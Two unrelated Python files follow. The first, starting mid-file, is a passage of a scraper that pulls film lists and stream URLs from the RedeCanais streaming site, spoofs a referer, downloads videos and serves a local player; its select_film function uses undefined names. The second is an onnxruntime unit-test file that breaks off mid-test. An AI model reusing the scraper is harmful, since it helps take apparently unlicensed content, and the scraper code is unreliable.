result = info.find_all('a')[1]
dict_films = {'title': result.img['alt'], 'url': BASE_URL + result['href'], 'img': result.img['data-echo']}
films_list.append(dict_films)
return films_list
def categories(self, url, category=None):
html = self.open(url)
soup = BeautifulSoup(html, 'html.parser')
tags = soup.find_all('li', {'class': 'dropdown-submenu'})[0]
tags.ul.unwrap()
new_html = str(tags).replace('dropdown-submenu', '').replace('</a>\n', '</a> </li>')
new_soup = BeautifulSoup(new_html, 'html.parser')
new_tags = new_soup.find_all('li')
category_list = []
for info in new_tags:
if category is not None:
if category == info.text:
category_dict = {'category': info.text, 'url': info.a['href']}
category_list.append(category_dict)
else:
category_dict = {'category': info.text, 'url': info.a['href']}
category_list.append(category_dict)
return category_list
def get_player(self, url):
html = self.open(url)
iframe = BeautifulSoup(html, 'html.parser')
url_player = iframe.find('div', {'id': 'video-wrapper'}).iframe['src']
url_player_dict = {'embed': url_player, 'player': url_player.replace('.php', 'playerfree.php')}
return url_player_dict
def get_stream(self, url, referer):
html = self.open(url, referer)
source = BeautifulSoup(html, 'html.parser')
url_stream = source.find('div', {'id': 'instructions'}).source['src']
return url_stream
def download(self, url):
filename = url.split('/')[-1].replace('?attachment=true', '')
print('Downloading...' + filename)
with requests.get(url, stream=True) as r:
with open(filename, 'wb') as f:
shutil.copyfileobj(r.raw, f)
def select_film(self, films):
print('\n')
for index, film in enumerate(films):
print(str(index) + ' == ' + film['title'])
print('\n')
selected = int(input('Digite o número correspondente ao filme que deseja assistir: '))
print(films[selected]['url'])
filme = films[selected]['url']
title = filmes[selected]['title']
img = filmes[selected]['img']
player_url = rede.get_player(filme)
video_url = rede.get_stream(url=player_url['player'], referer=player_url['embed'])
print(video_url)
rede.play(video_url, title, img)
return
def play(self, url, title=None, img=None):
html_player = """
<!DOCTYPE html>
<html lang="en">
<style>
.container {
width: 100vw;
height: 100vh;
background: #6C7A89;
display: flex;
flex-direction: row;
justify-content: center;
align-items: center
}
.title {
text-align: center;
}
.google-cast-launcher {
float: right;
margin: -55px 200px 14px 0px;
width: 40px;
height: 32px;
opacity: 0.7;
background-color: #000;
border: none;
outline: none;
}
.google-cast-launcher:hover {
--disconnected-color: white;
--connected-color: white;
}
body {
margin: 0px;
}
</style>
<head>
<meta charset="UTF-8">
<title>afterglow player</title>
<script rel="stylesheet" src="https://www.gstatic.com/cv/js/sender/v1/cast_sender.js?loadCastFramework=1" type="text/javascript"></script>
<script rel="stylesheet" src="https://fenny.github.io/ChromecastJS/chromecastjs.js" type="text/javascript"></script>
<script rel="stylesheet" src="https://cdn.jsdelivr.net/afterglow/latest/afterglow.min.js" type="text/javascript"></script>
</head>
<body>
<div class="title">
<h3>RedeCanais Player With Python Backend</h3>
</div>
<div class="container">
<div>
<video class="afterglow" id="myvideo" controls width="1080" height="500" autoplay="autoplay" src="%(url)s"></video>
<button class="google-cast-launcher" is="google-cast-button"></button>
</div>
</div>
</body>
<script>
let cc = new ChromecastJS();
cc.on('available', function() {
cc.cast({
content: '%(url)s',
poster: '%(img)s',
title: '%(title)s',
description: 'Filme'
})
})
</script>
</html>
"""
dict_details = {"url": url,
"title": title,
"img": img
}
with open('player.html', 'w') as f:
f.write(html_player % dict_details)
simple_server = SimpleServerHttp()
simple_server.start()
webbrowser.open('http://localhost:9090/player.html')
print('Starting video')
time.sleep(360)
simple_server.stop()
return
if __name__ == '__main__':
rede = ChannelsNetwork()
#categorias = rede.categories(BASE_URL + '/browse.html')
#print(categorias)
#filmes = rede.films(BASE_URL + '/browse.html', category='filmes 2018', page=3)
#search_film = rede.search()
#print(search_film)
filmes = rede.films(BASE_URL, category={'category': 'dublado', 'genre': 'terror', 'page': 1})
#print(filmes)
"""print('\n')
for index, film in enumerate(filmes):
print(str(index) + ' == ' + film['title'])
print('\n')
select = int(input('Digite o número correspondente ao filme que deseja assistir: '))
print(filmes[select]['url'])
filme = filmes[select]['url']
player_url = rede.get_player(filme)
video_url = rede.get_stream(url=player_url['player'], referer=player_url['embed'])
print(video_url)
rede.play(video_url)
"""
#player_url = rede.get_player('https://redecanais.rocks/doutor-estranho-dublado-2016-1080p_55218911d.html')
#print(player_url)
#video_url = rede.get_stream(url='https://cometa.top/player3/serverfplayerfree.php?vid=VNGDRSULTMTO4K', referer='https://cometa.top/player3/serverf.php?vid=VNGDRSULTMTO4K')
#video_url = rede.get_stream(url=player_url['player'], referer=player_url['embed'])
#print(video_url)
#search_film = rede.search()
#print(search_film)
#rede.download(video_url)
#rede.play(video_url)
select_film = rede.select_film(filmes)
|
onnxruntime_test_python.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# -*- coding: UTF-8 -*-
import unittest
import os
import numpy as np
import onnxruntime as onnxrt
import threading
import sys
from helper import get_name
class TestInferenceSession(unittest.TestCase):
def run_model(self, session_object, run_options):
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = session_object.get_inputs()[0].name
res = session_object.run([], {input_name: x}, run_options=run_options)
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testModelSerialization(self):
so = onnxrt.SessionOptions()
so.log_verbosity_level = 1
so.logid = "TestModelSerialization"
so.optimized_model_filepath = "./PythonApiTestOptimizedModel.onnx"
onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
self.assertTrue(os.path.isfile(so.optimized_model_filepath))
def testGetProviders(self):
self.assertTrue('CPUExecutionProvider' in onnxrt.get_available_providers())
# get_all_providers() returns the default EP order from highest to lowest.
# CPUExecutionProvider should always be last.
self.assertTrue('CPUExecutionProvider' == onnxrt.get_all_providers()[-1])
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
self.assertTrue('CPUExecutionProvider' in sess.get_providers())
def testSetProviders(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
# confirm that CUDA Provider is in list of registered providers.
self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
# reset the session and register only CPU Provider.
sess.set_providers(['CPUExecutionProvider'])
# confirm only CPU Provider is registered now.
self.assertEqual(['CPUExecutionProvider'], sess.get_providers())
def testSetProvidersWithOptions(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
import sys
import ctypes
CUDA_SUCCESS = 0
def runBaseTest1():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
option1 = {'device_id': 0}
sess.set_providers(['CUDAExecutionProvider'], [option1])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
option2 = {'device_id': -1}
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option2])
sess.set_providers(['CUDAExecutionProvider', 'CPUExecutionProvider'], [option1, {}])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
def runBaseTest2():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
# test get/set of "cuda_mem_limit" configuration.
options = sess.get_provider_options()
self.assertTrue('CUDAExecutionProvider' in options)
option = options['CUDAExecutionProvider']
self.assertTrue('cuda_mem_limit' in option)
ori_mem_limit = option['cuda_mem_limit']
new_mem_limit = int(ori_mem_limit) // 2
option['cuda_mem_limit'] = new_mem_limit
sess.set_providers(['CUDAExecutionProvider'], [option])
options = sess.get_provider_options()
self.assertEqual(options['CUDAExecutionProvider']['cuda_mem_limit'], str(new_mem_limit))
option['cuda_mem_limit'] = ori_mem_limit
sess.set_providers(['CUDAExecutionProvider'], [option])
options = sess.get_provider_options()
self.assertEqual(options['CUDAExecutionProvider']['cuda_mem_limit'], ori_mem_limit)
# test get/set of "arena_extend_strategy" configuration.
options = sess.get_provider_options()
self.assertTrue('CUDAExecutionProvider' in options)
option = options['CUDAExecutionProvider']
self.assertTrue('arena_extend_strategy' in option)
for strategy in ['kNextPowerOfTwo', 'kSameAsRequested']:
option['arena_extend_strategy'] = strategy
sess.set_providers(['CUDAExecutionProvider'], [option])
options = sess.get_provider_options()
self.assertEqual(options['CUDAExecutionProvider']['arena_extend_strategy'], strategy)
#
# Note: Tests that throw an exception leave an empty session due to how set_providers currently works,
# so run them last. Each set_providers call will attempt to re-create a session, so it's
# fine for a test that fails to run immediately after another one that fails.
# Alternatively a valid call to set_providers could be used to recreate the underlying session
# after a failed call.
#
option['arena_extend_strategy'] = 'wrong_value'
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
option['cuda_mem_limit'] = -1024
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
option['cuda_mem_limit'] = 1024.1024
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
option['cuda_mem_limit'] = 'wrong_value'
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
def getCudaDeviceCount():
import ctypes
num_device = ctypes.c_int()
result = ctypes.c_int()
error_str = ctypes.c_char_p()
result = cuda.cuInit(0)
result = cuda.cuDeviceGetCount(ctypes.byref(num_device))
if result != CUDA_SUCCESS:
cuda.cuGetErrorString(result, ctypes.byref(error_str))
print("cuDeviceGetCount failed with error code %d: %s" % (result, error_str.value.decode()))
return -1
return num_device.value
def setDeviceIdTest(i):
import ctypes
import onnxruntime as onnxrt
device = ctypes.c_int()
result = ctypes.c_int()
error_str = ctypes.c_char_p()
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
option = {'device_id': i}
sess.set_providers(['CUDAExecutionProvider'], [option])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
result = cuda.cuCtxGetDevice(ctypes.byref(device))
if result != CUDA_SUCCESS:
cuda.cuGetErrorString(result, ctypes.byref(error_str))
print("cuCtxGetDevice failed with error code %d: %s" % (result, error_str.value.decode()))
self.assertEqual(result, CUDA_SUCCESS)
self.assertEqual(i, device.value)
def runAdvancedTest():
num_device = getCudaDeviceCount()
if num_device < 0:
return
# Configure session to be ready to run on all available cuda devices
for i in range(num_device):
setDeviceIdTest(i)
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
# configure session with not legit option values and that shloud fail
with self.assertRaises(RuntimeError):
option = {'device_id': num_device}
sess.set_providers(['CUDAExecutionProvider'], [option])
option = {'device_id': 'non_legit_value'}
sess.set_providers(['CUDAExecutionProvider'], [option])
# configure session with not legit option should cause no effect
option = {'device_id': 0}
sess.set_providers(['CUDAExecutionProvider'], [option])
option = {'non_legit_option': num_device}
sess.set_providers(['CUDAExecutionProvider'], [option])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
libnames = ('libcuda.so', 'libcuda.dylib', 'cuda.dll')
for libname in libnames:
try:
cuda = ctypes.CDLL(libname)
runBaseTest1()
runBaseTest2()
runAdvancedTest()
except OSError:
continue
else:
break
else:
runBaseTest1()
runBaseTest2()
# raise OSError("could not load any of: " + ' '.join(libnames))
def testInvalidSetProviders(self):
with self.assertRaises(ValueError) as context:
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
sess.set_providers(['InvalidProvider'])
self.assertTrue(
'[\'InvalidProvider\'] does not contain a subset of available providers' in str(context.exception))
def testSessionProviders(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
# create session from scratch, but constrain it to only use the CPU.
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=['CPUExecutionProvider'])
self.assertEqual(['CPUExecutionProvider'], sess.get_providers())
def testRunModel(self):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 2])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModelFromBytes(self):
with open(get_name("mul_1.onnx"), "rb") as f:
content = f.read()
sess = onnxrt.InferenceSession(content)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 2])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModel2(self):
sess = onnxrt.InferenceSession(get_name("matmul_1.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModel2Contiguous(self):
sess = onnxrt.InferenceSession(get_name("matmul_1.onnx"))
x = np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]], dtype=np.float32)[:, [1, 0]]
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
xcontiguous = np.ascontiguousarray(x)
rescontiguous = sess.run([output_name], {input_name: xcontiguous})
np.testing.assert_allclose(output_expected, rescontiguous[0], rtol=1e-05, atol=1e-08)
def testRunModelMultipleThreads(self):
available_providers = onnxrt.get_available_providers()
# Skip this test for a "pure" DML onnxruntime python wheel. We keep this test enabled for instances where both DML and CUDA
# EPs are available (Windows GPU CI pipeline has this config) - this test will pass because CUDA has higher precendence than DML
# and the nodes are assigned to only the CUDA EP (which supports this test)
if ('DmlExecutionProvider' in available_providers and not 'CUDAExecutionProvider' in available_providers):
print("Skipping testRunModelMultipleThreads as the DML EP does not support calling Run() on different threads using the same session object ")
else:
so = onnxrt.SessionOptions()
so.log_verbosity_level = 1
so.logid = "MultiThreadsTest"
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
ro1 = onnxrt.RunOptions()
ro1.logid = "thread1"
t1 = threading.Thread(target=self.run_model, args=(sess, ro1))
ro2 = onnxrt.RunOptions()
ro2.logid = "thread2"
t2 = threading.Thread(target=self.run_model, args=(sess, ro2))
t1.start()
t2.start()
t1.join()
t2.join()
def testListAsInput(self):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
res = sess.run([], {input_name: x.tolist()})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testStringListAsInput(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'], dtype=np.str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
res = sess.run([], {x_name: x.tolist()})
np.testing.assert_equal(x, res[0])
def testRunDevice(self):
device = onnxrt.get_device()
self.assertTrue('CPU' in device or 'GPU' in device)
def testRunModelSymbolicInput(self):
sess = onnxrt.InferenceSession(get_name("matmul_2.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
# Input X has an unknown dimension.
self.assertEqual(input_shape, ['None', 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
# Output X has an unknown dimension.
self.assertEqual(output_shape, ['None', 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testBooleanInputs(self):
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"))
a = np.array([[True, True], [False, False]], dtype=np.bool)
b = np.array([[True, False], [True, False]], dtype=np.bool)
# input1:0 is first in the protobuf, and input:0 is second
# and we maintain the original order.
a_name = sess.get_inputs()[0].name
self.assertEqual(a_name, "input1:0")
a_shape = sess.get_inputs()[0].shape
self.assertEqual(a_shape, [2, 2])
a_type = sess.get_inputs()[0].type
self.assertEqual(a_type, 'tensor(bool)')
b_name = sess.get_inputs()[1].name
self.assertEqual(b_name, "input:0")
b_shape = sess.get_inputs()[1].shape
self.assertEqual(b_shape, [2, 2])
b_type = sess.get_inputs()[0].type
self.assertEqual(b_type, 'tensor(bool)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(bool)')
output_expected = np.array([[True, False], [False, False]], dtype=np.bool)
res = sess.run([output_name], {a_name: a, b_name: b})
np.testing.assert_equal(output_expected, res[0])
def testStringInput1(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'], dtype=np.str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testStringInput2(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['Olá', '你好', '여보세요', 'hello'], dtype=np.unicode).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testInputBytes(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array([b'this', b'is', b'identity', b'test']).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0].astype('|S8'))
def testInputObject(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'], object).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testInputVoid(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array([b'this', b'is', b'identity', b'test'], np.void).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
expr = np.array([['this\x00\x00\x00\x00', 'is\x00\x00\x00\x00\x00\x00'], ['identity', 'test\x00\x00\x00\x00']],
dtype=object)
np.testing.assert_equal(expr, res[0])
def testRaiseWrongNumInputs(self):
with self.assertRaises(ValueError) as context:
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"))
a = np.array([[True, True], [False, False]], dtype=np.bool)
res = sess.run([], {'input:0': a})
self.assertTrue('Model requires 2 inputs' in str(context.exception))
def testModelMeta(self):
model_path = "../models/opset8/test_squeezenet/model.onnx"
if not os.path.exists(model_path):
return
sess = onnxrt.InferenceSession(model_path)
modelmeta = sess.get_modelmeta()
self.assertEqual('onnx-caffe2', modelmeta.producer_name)
self.assertEqual('squeezenet_old', modelmeta.graph_name)
self.assertEqual('', modelmeta.domain)
self.assertEqual('', modelmeta.description)
def testProfilerWithSessionOptions(self):
so = onnxrt.SessionOptions()
so.enable_profiling = True
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
sess.run([], {'X': x})
profile_file = sess.end_profiling()
tags = ['pid', 'dur', 'ts', 'ph', 'X', 'name', 'args']
with open(profile_file) as f:
lines = f.readlines()
self.assertTrue('[' in lines[0])
for i in range(1, 8):
for tag in tags:
self.assertTrue(tag in lines[i])
self.assertTrue(']' in lines[8])
def testGraphOptimizationLevel(self):
opt = onnxrt.SessionOptions()
# default should be all optimizations optimization
self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL)
opt.graph_optimization_level = onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED
self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED)
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"), sess_options=opt)
a = np.array([[True, True], [False, False]], dtype=np.bool)
b = np.array([[True, False], [True, False]], dtype=np.bool)
res = sess.run([], {'input1:0': a, 'input:0': b})
def testSequenceLength(self):
sess = onnxrt.InferenceSession(get_name("sequence_length.onnx"))
x = [
np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3)),
np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3))
]
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "X")
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'seq(tensor(float))')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(int64)')
output_expected = np.array(2, dtype=np.int64)
res = sess.run([output_name], {x_name: x})
self.assertEqual(output_expected, res[0])
def testSequenceConstruct(self):
sess = onnxrt.InferenceSession(get_name("sequence_construct.onnx"))
self.assertEqual(sess.get_inputs()[0].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[1].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[0].name, "tensor1")
self.assertEqual(sess.get_inputs()[1].name, "tensor2")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output_sequence")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'seq(tensor(int64))')
output_expected = [
np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3))
]
res = sess.run(
[output_name], {
"tensor1": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
"tensor2": np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3))
})
np.testing.assert_array_equal(output_expected, res[0])
def testSequenceInsert(self):
opt = onnxrt.SessionOptions()
opt.execution_mode = onnxrt.ExecutionMode.ORT_SEQUENTIAL
sess = onnxrt.InferenceSession(get_name("sequence_insert.onnx"), sess_options=opt)
self.assertEqual(sess.get_inputs()[0].type, 'seq(tensor(int64))')
self.assertEqual(sess.get_inputs()[1].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[0].name, "input_seq")
self.assertEqual(sess.get_inputs()[1].name, "tensor")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output_sequence")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'seq(tensor(int64))')
output_expected = [np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3))]
res = sess.run([output_name], {
"tensor": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
"input_seq": []
})
np.testing.assert_array_equal(output_expected, res[0])
def testOrtExecutionMode(self):
opt = onnxrt.SessionOptions()
self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_SEQUENTIAL)
opt.execution_mode = onnxrt.ExecutionMode.ORT_PARALLEL
self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_PARALLEL)
def testLoadingSessionOptionsFromModel(self):
try:
os.environ['ORT_LOAD_CONFIG_FROM_MODEL'] = str(1)
sess = onnxrt.InferenceSession(get_name("model_with_valid_ort_config_json.onnx"))
session_options = sess.get_session_options()
self.assertEqual(session_options.inter_op_num_threads, 5) # from the ORT config
self.assertEqual(session_options.intra_op_num_threads, 2) # from the ORT config
self.assertEqual(session_options.execution_mode,
onnxrt.ExecutionMode.ORT_SEQUENTIAL) # default option (not from the ORT config)
self.assertEqual(session_options.graph_optimization_level,
onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL) # from the ORT config
self.assertEqual(session_options.enable_profiling, True) # from the ORT config
except Exception:
raise
finally:
# Make sure the usage of the feature is disabled after this test
os.environ['ORT_LOAD_CONFIG_FROM_MODEL'] = str(0)
def testSessionOptionsAddFreeDimensionOverrideByDenotation(self):
so = onnxrt.SessionOptions()
so.add_free_dimension_override_by_denotation("DATA_BATCH", 3)
so.add_free_dimension_override_by_denotation("DATA_CHANNEL", 5)
sess = onnxrt.InferenceSession(get_name("abs_free_dimensions.onnx"), so)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "x")
input_shape = sess.get_inputs()[0].shape
# Free dims with denotations - "DATA_BATCH" and "DATA_CHANNEL" have values assigned to them.
self.assertEqual(input_shape, [3, 5, 5])
def testSessionOptionsAddFreeDimensionOverrideByName(self):
so = onnxrt.SessionOptions()
so.add_free_dimension_override_by_name("Dim1", 4)
so.add_free_dimension_override_by_name("Dim2", 6)
sess = onnxrt.InferenceSession(get_name("abs_free_dimensions.onnx"), so)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "x")
input_shape = sess.get_inputs()[0].shape
# "Dim1" and "Dim2" have values assigned to them.
self.assertEqual(input_shape, [4, 6, 5])
def testSessionOptionsAddConfigEntry(self):
so = onnxrt.SessionOptions()
key = "CONFIG_KEY"
val = "CONFIG_VAL"
so.add_session_config_entry(key, val)
self.assertEqual(so.get_session_config_entry(key), val)
def testInvalidSessionOptionsConfigEntry(self):
so = onnxrt.SessionOptions()
invalide_key = "INVALID_KEY"
with self.assertRaises(RuntimeError) as context:
so.get_session_config_entry(invalide_key)
self.assertTrue(
'SessionOptions does not have configuration with key: ' + invalide_key in str(context.exception))
def testRegisterCustomOpsLibrary(self):
if sys.platform.startswith("win"):
shared_library = 'custom_op_library.dll'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
elif sys.platform.startswith("darwin"):
shared_library = 'libcustom_op_library.dylib'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
else:
shared_library = './libcustom_op_library.so'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
this = os.path.dirname(__file__)
custom_op_model = os.path.join(this, "testdata", "custom_op_library", "custom_op_test.onnx")
if not os.path.exists(custom_op_model):
raise FileNotFoundError("Unable to find '{0}'".format(custom_op_model))
so1 = onnxrt.SessionOptions()
so1.register_custom_ops_library(shared_library)
# Model loading successfully indicates that the custom op node could be resolved successfully
sess1 = onnxrt.InferenceSession(custom_op_model, so1)
#Run with input data
